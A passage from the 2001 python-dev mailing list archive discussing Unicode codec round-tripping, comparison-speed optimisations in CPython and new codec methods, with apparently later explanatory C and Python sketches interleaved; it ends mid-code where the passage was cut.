> * sort the items before creating the encoding table from the
>   decoding one (makes the mapping stable)

If users don't care that round-trip can fail silently, fine.

> * map keys which have multiple mappings in the encoding table
>   to None -- this causes their usage to raise an exception
>   (undefined mapping)

If users don't care that they'll get an exception when they try something
that can't be round-tripped, fine.  Or would this depend on the value of the
"errors" argument too?  Then it's easier to impose.

There's a theme here <wink>:  I have no idea how important roundtrip is in
Unicode Practice, or even that it's a constant across apps and encodings.  If
I write a codec to map all ASCII consonants to u"k" and vowels to u"a",  I
wouldn't care that I can't get "love" back from u"kaka" <wink>.
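
Tim's joke codec illustrates why some mappings cannot round-trip: many inputs share one output. A tiny C sketch of that hypothetical "codec" follows; the name `kaka_encode` is invented here. It shows two different words encoding identically, so no decoder could recover both.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Map ASCII vowels to 'a' and all other ASCII letters to 'k'; copy
   everything else unchanged.  out must hold strlen(in) + 1 bytes. */
static void kaka_encode(const char *in, char *out)
{
    size_t i;
    for (i = 0; in[i] != '\0'; i++) {
        unsigned char c = (unsigned char)in[i];
        if (!isalpha(c))
            out[i] = in[i];
        else if (strchr("aeiouAEIOU", c) != NULL)
            out[i] = 'a';
        else
            out[i] = 'k';
    }
    out[i] = '\0';
}
```

Both "love" and "lime" encode to "kaka", so a decoder has nothing to go on.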


From mal at lemburg.com  Tue May 15 10:19:06 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 10:19:06 +0200
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
Message-ID: <3B00E67A.C5769082@lemburg.com>

Tim Peters wrote:
> 
> I don't know that the Unicode docs need massive work, but the docs that are
> there simply don't answer the technical questions people have:  they're too
> thin.

As much as I would like to work on this, I simply don't have the
time... if someone wants to contribute more detailed docs, though,
I'd be glad to review them and answer remaining questions.

Note that I will give a talk at the upcoming Bordeaux conference about
Python and Unicode. The slides will eventually go online after
the conference (in July). BTW, are any python-devs attending the
conference (they have some great wine in that part of France ;-) ?

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Tue May 15 10:32:14 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 10:32:14 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCAEEJKCAA.tim.one@home.com>
Message-ID: <3B00E98E.1C44FF5@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > The problem is: which part would raise the exception -- the
> > encoder or the decoder ?
> 
> Since I don't yet use any of this stuff for real, I have no idea:  seems
> mostly a question of pragmatics, and I don't have any feel for how cp875
> users would view it.

If there are any... that code page dates back to 1996 and is
based in the EBCDIC world.
 
> > Here are some more options:
> >
> > * sort the items before creating the encoding table from the
> >   decoding one (makes the mapping stable)
> 
> If users don't care that round-trip can fail silently, fine.
> 
> > * map keys which have multiple mappings in the encoding table
> >   to None -- this causes their usage to raise an exception
> >   (undefined mapping)
> 
> If users don't care that they'll get an exception when they try something
> that can't be round-tripped, fine.  Or would this depend on the value of the
> "errors" argument too?  Then it's easier to impose.

The errors argument tells the codecs what to do in case a mapping
fails (from codecs.py):

        The .encode()/.decode() methods may implement different error
        handling schemes by providing the errors argument. These
        string values are defined:

         'strict' - raise a ValueError error (or a subclass)
         'ignore' - ignore the character and continue with the next
         'replace' - replace with a suitable replacement character;
                    Python will use the official U+FFFD REPLACEMENT
                    CHARACTER for the builtin Unicode codecs.

'strict' is the default for all operations that deal with auto-
conversion. 'ignore' and 'replace' allow silently ignoring the
problem.
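
The three errors values are easiest to compare side by side. Below is a C sketch of an ASCII decoder that honours 'strict', 'ignore' and 'replace'. It follows the descriptions quoted above and emits U+FFFD for 'replace'. `ErrorMode`, `ascii_decode` and `parse_errors` are hypothetical names, and UCS-2 code units stand in for Python's Unicode storage.

```c
#include <stddef.h>
#include <string.h>

typedef enum { ERR_STRICT, ERR_IGNORE, ERR_REPLACE } ErrorMode;

/* Decode n ASCII bytes into UCS-2 code units.  Bytes >= 0x80 are
   errors, handled according to mode:
     ERR_STRICT  - stop and report failure (Python raises here)
     ERR_IGNORE  - drop the byte and continue with the next
     ERR_REPLACE - emit U+FFFD REPLACEMENT CHARACTER
   Returns the number of code units written, or (size_t)-1 on a
   strict-mode failure. */
static size_t ascii_decode(const unsigned char *in, size_t n,
                           unsigned short *out, ErrorMode mode)
{
    size_t i, j = 0;
    for (i = 0; i < n; i++) {
        if (in[i] < 0x80)
            out[j++] = in[i];
        else if (mode == ERR_STRICT)
            return (size_t)-1;
        else if (mode == ERR_REPLACE)
            out[j++] = 0xFFFD;
        /* ERR_IGNORE: write nothing for this byte */
    }
    return j;
}

/* Map the error-handling names onto the enum; unknown names -> -1. */
static int parse_errors(const char *name, ErrorMode *mode)
{
    if (strcmp(name, "strict") == 0)  { *mode = ERR_STRICT;  return 0; }
    if (strcmp(name, "ignore") == 0)  { *mode = ERR_IGNORE;  return 0; }
    if (strcmp(name, "replace") == 0) { *mode = ERR_REPLACE; return 0; }
    return -1;
}
```

On the input bytes 'a', 0xE4, 'b', 'strict' fails, 'ignore' yields "ab", and 'replace' yields "a\uFFFDb".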
 
> There's a theme here <wink>:  I have no idea how important roundtrip is in
> Unicode Practice, or even that it's a constant across apps and encodings.  If
> I write a codec to map all ASCII consonants to u"k" and vowels to u"a",  I
> wouldn't care that I can't get "love" back from u"kaka" <wink>.

Round-tripping is obviously very important if you use Unicode
as basis for working on text. I don't know about the reasoning
behind making cp875 fail the round-trip -- Unicode certainly
provides means to make mappings round-trip safe (e.g. by resorting
to code points in the Private Use Area).
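
This is a C sketch with plain arrays of the second option from earlier in the thread. The encoding table is derived from the decoding table, and any code point that several bytes decode to is left undefined, so encoding it fails instead of silently picking one byte. The array layout, the `UNDEFINED`/`AMBIGUOUS` sentinels and `make_encoding_table` are assumptions for illustration. They are not the representation Python's charmap codecs use.

```c
#define UNDEFINED (-1)   /* no byte decodes to this code point */
#define AMBIGUOUS (-2)   /* several bytes decode to it: treat as undefined */

/* dec[b] is the code point (<= 0xFFFF) that byte b decodes to.
   Fill enc[cp] with the single byte that decodes to cp, or with a
   negative sentinel.  An encoder should apply its errors policy
   (e.g. raise under 'strict') on any negative entry. */
static void make_encoding_table(const unsigned short dec[256], int enc[0x10000])
{
    long cp;
    int b;
    for (cp = 0; cp < 0x10000; cp++)
        enc[cp] = UNDEFINED;
    for (b = 0; b < 256; b++) {
        unsigned short u = dec[b];
        /* first byte claims u; any later claim marks it ambiguous */
        enc[u] = (enc[u] == UNDEFINED) ? b : AMBIGUOUS;
    }
}
```

The first option (sorting before inverting) would instead keep one of the colliding bytes deterministically, which makes the mapping stable but lets round-trips fail silently.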

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Tue May 15 11:26:32 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 05:26:32 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>

[Martin v. Loewis]
> Is this really exactly what Python would guarantee? I'm surprised that
> x==x would always be true, but x!=x might be true also. In a type where
> x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
> I had expected that you'd reduced it to
>
>   if (v == w && op == Py_EQ) /* then return Py_True */
>   if (v == w && op == Py_NE) /* then return Py_False */

I agree that would be more analogous to what PyObject_Compare() does.

I'm not sure either makes sense for rich comparisons; for example, under
IEEE-754 rules, a NaN must compare not-equal to everything, including
itself(!), and richcmps are the only hope Python users have of modeling that.
Doing those pointer checks before giving richcmps a chance would kill that
hope.  Can we agree to drop this one until somebody produces stats saying
it's important?  I have no reason to suspect that it is.
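
Tim's IEEE-754 point is easy to check in C. A NaN is unequal to itself, so a shortcut that answered Py_EQ with "true" whenever both operands are the same object would be wrong for such a value. This minimal sketch assumes a C99 compiler with IEEE-754 doubles and no fast-math style options that relax NaN semantics. Both function names are hypothetical.

```c
#include <math.h>

/* What a pointer-identity shortcut would claim for "*a == *b". */
static int identity_shortcut_eq(const double *a, const double *b)
{
    return a == b;          /* same object => "equal" */
}

/* What IEEE-754 actually says for *a == *b. */
static int ieee_eq(const double *a, const double *b)
{
    return *a == *b;
}
```

For `double x = NAN;`, the shortcut reports `x` equal to itself while `ieee_eq(&x, &x)` is 0.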

> The one application where this may help is list_contains, in
> particular when searching a list of interned strings.

string_compare() could special-case pointer equality too, although I suspect
doing so would be a net loss.

> Please have a look at the patch below.

I will, but not tonight anymore -- it's been a very long day.

> ...
> I agree "in principle" :-) However, you cannot move the case "equal
> types, implementing tp_compare" before the case "one of them
> implements tp_richcompare" without changing the semantics.

Of course.  But except for instance objects, answering "does the type
implement tp_richcompare?" is one lousy pointer check, and the answer will
usually be -- provided we don't start stuffing code into *every* object's
tp_richcompare slot! -- "no, so I can go to tp_compare immediately".
Coercions and richcmps are the oddball cases today.

> The change here is what you'd do when you have both richcmp and
> oldcomp; Python clearly mandates using richcmp.

Yes, except you don't usually have both today and reality is exploitable
<wink>.

> In case this is not obvious (it wasn't to me): UserList will complain
> about using the deprecated __cmp__,

Sounds like a bug to me; if cmp is deprecated, that's also news to me.

> and dictionaries will iterate over their elements differently.

dicts didn't have a tp_richcompare slot before I added it last week, and I
added it because dicts can do a much faster and more-general job on Py_EQ
and Py_NE than dict cmp can (but on nothing else).  I originally took away
the tp_compare slot for dicts and lived to regret it -- it has both now.

> Given that richcomp has to be tried first, this patch does the "common
> case" at the earliest possible time, and with no overhead, except for
> PyErr_Occurred call.

The earliest *reasonable* time would be after a short block of new pointer
checks while still inside PyObject_RichCompare():  I believe the usual case
today is that the objects are of the same type, the type doesn't have a
tp_richcompare slot, but does have a tp_compare slot.  This covers at least
ints, floats, longs and strings, where the overhead of a single function call
is most often larger than the time it actually takes to compare the darned
things.  It's not important to, e.g., get to a dict comparison quickly,
because comparing dicts is darned expensive even after we find the dict
comparison routine.  Ditto comparing instances or matrices etc.  Optimizing
for richcmps is optimizing the less important thing.

BTW, tuples have a richcompare slot today and it's unclear that's a good
idea.  They do the same kind of Py_EQ/Py_NE "length check" you like for
strings, and I'd be surprised if that didn't cost more than it saves.  Unlike
strings, whenever I compare tuples they *always* have the same size (e.g.,
think of all the decorator pattern ways tuples are used to augment sorts).

OK, across a full run of the test suite, tuplerichcompare() was called about
162000 times, all but about 50 times with Py_EQ or Py_NE.  The number of
times this code block at the start bore fruit:

	if (vt->ob_size != wt->ob_size && (op == Py_EQ || op == Py_NE)) {
		/* Shortcut: if the lengths differ, the tuples differ */
		PyObject *res;
		if (op == Py_EQ)
			res = Py_False;
		else
			res = Py_True;
		Py_INCREF(res);
		return res;
	}

was 0 -- the tuples were always the same size for Py_EQ/Py_NE, and the code
just burned cycles.  I want to move toward optimizations that save more than
they cost <0.7 wink>.
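
The measurement Tim describes can be reproduced by putting a pair of counters around the shortcut. This sketch uses a toy tuple of longs. `ToyTuple`, `tuple_eq` and the counter names are hypothetical, and the length test mirrors the block quoted above.

```c
#include <stddef.h>

typedef struct {
    size_t size;
    const long *items;
} ToyTuple;

/* Instrumentation: how often the length shortcut was tried vs. fired. */
static unsigned long shortcut_tries = 0;
static unsigned long shortcut_hits = 0;

/* Returns 1 if the tuples are equal, else 0. */
static int tuple_eq(const ToyTuple *v, const ToyTuple *w)
{
    size_t i;
    shortcut_tries++;
    if (v->size != w->size) {
        shortcut_hits++;            /* lengths differ: tuples differ */
        return 0;
    }
    for (i = 0; i < v->size; i++)
        if (v->items[i] != w->items[i])
            return 0;
    return 1;
}
```

Printing the two counters at exit after a full test-suite run gives the kind of ratio Tim reports. A shortcut that is tried on every call but never fires is pure overhead.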

> ...
> For strings, I would still special-case tp_richcompare: when tracing
> calls to string_richcompare, I found that most calls with Py_EQ can
> be decided by checking that the string lengths are not equal.

I expect you'd also find that the current string_compare() usually decides
they're not equal on the first character comparison (which *it*
special-cases).  So special-casing on length isn't a clear win over what's
already done.  But, if it is, bravo!  Special-case the snot out of it without
calling *any* string functions (merely calling string_richcompare likely
costs a good deal more than comparing the lengths).
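
Here is a sketch of a byte-string equality test that puts both cheap rejections inline before the full comparison: length first, then the first byte, then memcmp. `ToyString` and `toy_string_eq` are hypothetical. Which rejection pays off more often depends on the data, which is exactly what the thread suggests measuring.

```c
#include <stddef.h>
#include <string.h>

typedef struct {
    size_t len;
    const char *data;
} ToyString;

/* Returns 1 if a and b hold the same bytes, else 0. */
static int toy_string_eq(const ToyString *a, const ToyString *b)
{
    if (a->len != b->len)
        return 0;                   /* length test */
    if (a->len == 0)
        return 1;                   /* both empty */
    if (a->data[0] != b->data[0])
        return 0;                   /* first-character test */
    return memcmp(a->data, b->data, a->len) == 0;
}
```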

more-measuring-less-guessing-ly y'rs  - tim


From thomas at xs4all.net  Tue May 15 13:51:06 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 15 May 2001 13:51:06 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <200105150426.f4F4QVx01531@localhost.local>; from uche.ogbuji@fourthought.com on Mon, May 14, 2001 at 10:26:31PM -0600
References: <tim.one@home.com> <200105150426.f4F4QVx01531@localhost.local>
Message-ID: <20010515135106.A16811@xs4all.nl>

On Mon, May 14, 2001 at 10:26:31PM -0600, Uche Ogbuji wrote:

> I thought I was the only one getting all these silly Nigerian scam spams.  I 
> figured maybe they saw my name and decided to test on me (though they might 
> more cleverly have figured that a fellow Nigerian would be wise to the game).

Actually, one of my colleagues informed me that this spam is in fact *very
old* (after I ROTFL'd rather loudly reading the Dilbert comic featuring the
Nigerian spam a mere week after getting the spam myself :) Scott (my
colleague, not Adams) remembers first getting it by fax, 15 years ago, and
again several years later. And not just one fax, but every single fax in the
company, and lots more outside of the company. Apparently the telephone
operator issued a warning to all customers not to respond to the fax.

Still-sound-advice-ly y'rs,

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Tue May 15 14:10:16 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 14:10:16 +0200
Subject: [Python-Dev] Easy codec access
Message-ID: <3B011CA8.9DDB4FC7@lemburg.com>

I've just checked in a set of patches which implement the new
.decode() method along with a couple of useful codecs.

You can now do things like these:

>>> "abc".encode('zlib').encode('base64')
'eJxLTEoGAAJNASc=\n'
>>> _.decode('base64').decode('zlib')
'abc'

>>> "abcäöü".decode('latin-1')
u'abc\xe4\xf6\xfc'

>>> "abcäöü".decode('latin-1').encode('latin-1')
'abc\xe4\xf6\xfc'

>>> "Hello World !".encode('rot13')
'Uryyb Jbeyq !'

So the overall codec experience should be a much better one
now.

To see just how easy it is to write codecs, please have
a look at the string codecs I added in this patch (e.g.
zlib_codec.py or hex_codec.py). I am pretty sure that there
are a lot more useful things in the standard lib which could
benefit from these easy-to-use interfaces.
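In Python 3, bytes-to-bytes and str-to-str codecs are no longer reachable through `.encode()`/`.decode()` on `bytes`/`str`. Here is a rough modern equivalent of the session above. It assumes Python 3.4 or later, where `codecs.encode()` and `codecs.decode()` accept the `zlib`, `base64` and `rot13` aliases.

```python
import codecs

# bytes -> bytes transforms go through codecs.encode/decode directly.
packed = codecs.encode(codecs.encode(b"abc", "zlib"), "base64")
unpacked = codecs.decode(codecs.decode(packed, "base64"), "zlib")

# Ordinary text codecs still hang off the str/bytes methods.
text = b"abc\xe4\xf6\xfc".decode("latin-1")       # 'abcäöü'
raw = text.encode("latin-1")                       # b'abc\xe4\xf6\xfc'

# rot13 is a str -> str transform.
rotated = codecs.encode("Hello World !", "rot13")  # 'Uryyb Jbeyq !'
```

The exact base64 text depends on the zlib build, so only the round trip is worth relying on.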

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at pythonware.com  Tue May 15 14:11:26 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Tue, 15 May 2001 14:11:26 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
References: <tim.one@home.com> <200105150426.f4F4QVx01531@localhost.local> <20010515135106.A16811@xs4all.nl>
Message-ID: <005701c0dd38$2f417560$0900a8c0@spiff>

thomas wrote:

> Actually, one of my colleagues informed me that this spam is in fact
> *very old*

more info here:

http://home.rica.net/alphae/419coal/index.htm

    "A Five Billion US$ (as of 1996, much more now) worldwide
    Scam which has run since the early 1980's under Successive
    Governments of Nigeria.

    "The Nigerian Scam is, according to published reports, the
    Third to Fifth largest industry in Nigeria."

Cheers /F (highest offer so far: $155,000,000)


From guido at digicool.com  Tue May 15 17:27:31 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 10:27:31 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Tue, 15 May 2001 05:26:32 -0400."
             <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> 
Message-ID: <200105151527.KAA28734@cj20424-a.reston1.va.home.com>

> [Martin v. Loewis]
> > Is this really exactly what Python would guarantee? I'm surprised that
> > x==x would always be true, but x!=x might be true also. In a type where
> > x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
> > I had expected that you'd reduced it to
> >
> >   if (v == w && op == Py_EQ) /* then return Py_True */
> >   if (v == w && op == Py_NE) /* then return Py_False */

[Tim]
> I agree that would be more analogous to what PyObject_Compare() does.
> 
> I'm not sure either make sense for rich comparisons; for example, under
> IEEE-754 rules, a NaN must compare not-equal to everything, including
> itself(!), and richcmps are the only hope Python users have of modeling that.
> Doing those pointer checks before giving richcmps a chance would kill that
> hope.  Can we agree to drop this one until somebody produces stats saying
> it's important?  I have no reason to suspect that it is.

PEP 207 is quite explicit that == and != are not to be assumed each
other's complement.  It is silent on the x==x issue but the PEP
mentions IEEE 754 so I agree that this also shouldn't be cut short.
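This short illustration shows why an identity shortcut in front of rich comparisons would be wrong. An IEEE 754 NaN compares unequal to itself, and PEP 207 lets a class define `__eq__` and `__ne__` independently. The class `Weird` is a made-up example.

```python
import math

nan = float("nan")
assert math.isnan(nan)

# IEEE 754: NaN is not equal to anything, itself included.
nan_eq_self = (nan == nan)   # False
nan_ne_self = (nan != nan)   # True


class Weird:
    """Hypothetical type whose == and != are not complements (allowed by PEP 207)."""

    def __eq__(self, other):
        return True

    def __ne__(self, other):
        return True


w = Weird()
both = (w == w, w != w)      # (True, True): neither result follows from identity
```

Modern CPython does take an identity shortcut when comparing container elements. As a result, `[nan] == [nan]` is `True` when both lists hold the same NaN object. The bare `==` operator shown here never takes that shortcut.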

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake at acm.org  Tue May 15 17:29:10 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 15 May 2001 11:29:10 -0400 (EDT)
Subject: [Python-Dev] Unicode docs
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
References: <3AFFA23F.248517E3@lemburg.com>
	<LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
Message-ID: <15105.19270.62890.240534@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > The latter addresses several *fundamental* questions untouched by
 > the former, like what are the datatypes of the arguments and the
 > result, what values does errors accept, and what do they mean?  The
 > first blurb answers some more, like what's the default encoding,
 > and which exception is raised?  Neither is complete on its own, but
 > the reference manual should have a complete answer to all such
 > questions.  It doesn't have to go on at great length.

  I've beefed up the description of the unicode() function by merging
the information from AMK's document.

 > A round-trip example would be invaluable.
 > 
 > If Fred wanted to incorporate a brief overview too, a light rework of
 > Andrew/Moshe's writeup would be an excellent start.

  I'd love to have a contribution from someone with more knowledge of
what's there than me.
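Below is a round-trip example of the kind Tim asks for, sketched in Python 3 terms. Here `str(bytes, encoding, errors)` and `bytes.decode()` play the role of the 2001 `unicode()` builtin, and the sample data is made up. The `errors` argument controls what happens to undecodable input:

- `'strict'` (the default) raises `UnicodeDecodeError`.
- `'replace'` substitutes U+FFFD.
- `'ignore'` drops the bad bytes.

```python
raw = b"caf\xc3\xa9"                      # UTF-8 encoding of 'café'

text = str(raw, "utf-8")                  # decode: bytes -> str
assert text == "caf\u00e9"
assert text.encode("utf-8") == raw        # encode back: the round trip is lossless

bad = b"caf\xe9"                          # Latin-1 bytes, not valid UTF-8
strict_raised = False
try:
    str(bad, "utf-8")                     # errors='strict' is the default
except UnicodeDecodeError:
    strict_raised = True

replaced = str(bad, "utf-8", "replace")   # 'caf\ufffd'
ignored = str(bad, "utf-8", "ignore")     # 'caf'
```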


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From guido at digicool.com  Tue May 15 18:35:09 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 11:35:09 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: Your message of "Tue, 15 May 2001 14:10:16 +0200."
             <3B011CA8.9DDB4FC7@lemburg.com> 
References: <3B011CA8.9DDB4FC7@lemburg.com> 
Message-ID: <200105151635.LAA29530@cj20424-a.reston1.va.home.com>

> I've just checked in a set of patches which implement the new
> .decode() method along with a couple of useful codecs.

Cool!

> To see just how easy it is to write codecs, please have
> a look at the string codecs I added in this patch (e.g.
> zlib_codec.py or hex_codec.py). I am pretty sure that there
> are a lot more useful things in the standard lib which could
> benefit from these easy-to-use interfaces.

As an exercise, I added a quoted-printable codec.  It was easy
indeed!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at effbot.org  Tue May 15 20:21:00 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Tue, 15 May 2001 20:21:00 +0200
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
Message-ID: <000901c0dd6b$cdb5d960$e46940d5@hagrid>

in case anyone has two hours to spare, and the right software,
MIT's dynamic languages group has posted a quicktime video of
their recent panel on language design.

http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html

(what 1/2 should result in, why it's good to have both CPython
and JPython, why whitespace is significant, why language design
is perhaps more related to architecture than math, and lots of
other goodies from Guy Steele and others)

Cheers /F


From nas at python.ca  Tue May 15 20:51:20 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 15 May 2001 11:51:20 -0700
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
In-Reply-To: <000901c0dd6b$cdb5d960$e46940d5@hagrid>; from fredrik@effbot.org on Tue, May 15, 2001 at 08:21:00PM +0200
References: <000901c0dd6b$cdb5d960$e46940d5@hagrid>
Message-ID: <20010515115120.A14357@glacier.fnational.com>

Fredrik Lundh wrote:
> in case anyone has two hours to spare, and the right software,
> MIT's dynamic languages group has posted a quicktime video of
> their recent panel on language design.
> 
> http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html

Does the streaming actually work for anyone?  I've given up and
started downloading the whole .mov files.

  Neil


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 21:45:59 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 21:45:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>

> more-measuring-less-guessing-ly y'rs  - tim

Producing numbers is easy :-) I've instrumented my version where
string implements richcmp, and special-cases everything I can think
of. Counting is done for running the test suite. With this, I get

Calls to string_richcompare:   2378660
Calls with different types:      33992 (ie. one is not a string)
Calls with identical strings:   120517
Calls where lens decide !EQ:   1775716
----------------------------
Calls richcmp -> oldcomp:       448435
Total calls to oldcomp:        1225643
Calls oldcomp -> memcmp:        860174

So 5% of the calls are with identical strings, for which I can
immediately decide the outcome. 75% can be decided in terms of the
string lengths, which leaves ca. 19% for cases where lexicographical
comparison is needed.
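The percentages can be re-derived from the counter table. The sketch below simply redoes that arithmetic, and the variable names are mine, not the instrumented build's. The "ca. 19%" left over is exactly the `Calls richcmp -> oldcomp` line.

```python
def pct(part, whole):
    """Percentage rounded to one decimal place."""
    return round(100 * part / whole, 1)


calls = 2378660            # calls to string_richcompare
different_types = 33992    # one operand is not a string
identical = 120517         # same object: outcome known at once
length_decides = 1775716   # lengths differ, so Py_EQ is false
oldcomp_calls = 1225643    # total calls to the old 3-way compare
memcmp_calls = 860174      # old compare had to fall through to memcmp

rest = calls - different_types - identical - length_decides   # 448435
identical_pct = pct(identical, calls)                          # 5.1
length_pct = pct(length_decides, calls)                        # 74.7
rest_pct = pct(rest, calls)                                    # 18.9
first_byte_pct = pct(oldcomp_calls - memcmp_calls, oldcomp_calls)  # 29.8
```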

In those cases, the first byte decides in 30%. If I remove the test
for "len decides !EQ", I get

#riches:                       2358322
#riches_ni:                      34108
#idents_decide:                 102050
#lens_decide:                        0
--------------------------------------
rest(computed):                2222164
#comps:                        2949421
#memcmps:                       917776

So still, ca. 30% can be decided by first byte. It still appears that
the total number of calls to memcmp is higher when the length is not
taken into consideration. To verify this claim, I've counted the cases
where the length decides the outcome but looking at the first byte
would also have decided it:

lens_decide:                    1784897
lens_decide_firstbyte_wouldhave:1671148

So in 6% of the cases, checking the length alone gives a decision
which looking at the first byte doesn't; plus it saves a function
call.

To support the thesis that Py_EQ is the common case for strings, I
counted the various operations:

pyEQ:2271593
pyLE:9234
pyGE:0
pyNE:20470
pyLT:22765
pyGT:578

Now, that might be flawed since comparing strings for equality is
extremely frequent in the testsuite. To give more credibility to the
data, I also ran setup.py with my instrumented ./python:

riches:21640
riches_ni:76
riches_ni1:0
idents:2885
idents_decide:2885
lens_decide:9472
lens_decide_firstbyte_wouldhave:6223
comps:26360
memcmps:19224
pyEQ:20093
pyLE:46
pyGE:1
pyNE:548
pyLT:876
pyGT:0

That shows that optimizing for Py_NE is not worth it. With these data,
I'll upload a patch to SF.

Regards,
Martin


From tim at digicool.com  Tue May 15 22:22:37 2001
From: tim at digicool.com (Tim Peters)
Date: Tue, 15 May 2001 16:22:37 -0400
Subject: [Python-Dev] Comparison corner case
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEINCAAA.tim@digicool.com>

Here's something from the tail end of a patch comment.  If you believe the illustrated
behavior is wrong, then I don't believe we gain anything from using the
tp_richcmp slot for tuples for anything other than EQ/NE testing (the gain
for the latter is that it allows EQ/NE tuple comparison to work correctly on
tuples containing elements that support only EQ/NE comparisons):

"""
BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
because it won't believe there's any difference unless Py_EQ returns false
for some corresponding elements:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> C() < C()
1
>>> (C(),) < (C(),)
0
>>>

That doesn't make sense -- provided you believe the defn. of C makes sense.
"""
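The sketch below shows roughly how the tuple/list rich comparison works, in Python. The function `seq_lt` is a hypothetical illustration, not CPython's code. It first finds the index where the items stop being `==` and lets `<` decide on that pair. If no such index exists, the shorter sequence is the smaller one. With Tim's class `C`, `==` always succeeds, so `<` on the elements is never consulted.

```python
class C:
    # Tim's example: every comparison claims to be true.
    def __lt__(self, other):
        return True
    __eq__ = __lt__


def seq_lt(v, w):
    """Sketch of lexicographic '<' for tuples and lists."""
    for x, y in zip(v, w):
        if not x == y:          # first non-equal position decides
            return x < y
    return len(v) < len(w)      # all shared items equal: compare lengths


direct = C() < C()                   # True
via_sketch = seq_lt((C(),), (C(),))  # False
builtin = (C(),) < (C(),)            # False in CPython as well
```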


From guido at digicool.com  Tue May 15 23:36:57 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 16:36:57 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 13:13:01 MST."
             <E14zlBl-0004pj-00@usw-pr-cvs1.sourceforge.net> 
References: <E14zlBl-0004pj-00@usw-pr-cvs1.sourceforge.net> 
Message-ID: <200105152136.QAA00489@cj20424-a.reston1.va.home.com>

Tim wrote:
> BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ returns false
> for some corresponding elements:
> 
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
> 
> That doesn't make sense -- provided you believe the defn. of C makes sense.

I think in this example the problem is with C, not with the tuple
algorithm.  The question is, what are you going to do otherwise?  You
could test for < first, == second -- but that means twice as many
comparisons, and for reasonably-behaved items it makes no difference
at all.
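To make the cost argument concrete, this sketch counts element comparisons for two strategies:

- The existing one does one `==` per matching position.
- The alternative tries `<` first and then `==`.

`Counted`, `eq_first`, `lt_first` and `comparisons` are hypothetical names. The alternative is only one plausible reading of "test for < first, == second".

```python
class Counted:
    """Wraps a value and counts every == and < made through it."""
    calls = 0

    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        Counted.calls += 1
        return self.value == other.value

    def __lt__(self, other):
        Counted.calls += 1
        return self.value < other.value


def eq_first(v, w):
    """Current strategy: skip the == prefix, then let < decide."""
    for x, y in zip(v, w):
        if not x == y:
            return x < y
    return len(v) < len(w)


def lt_first(v, w):
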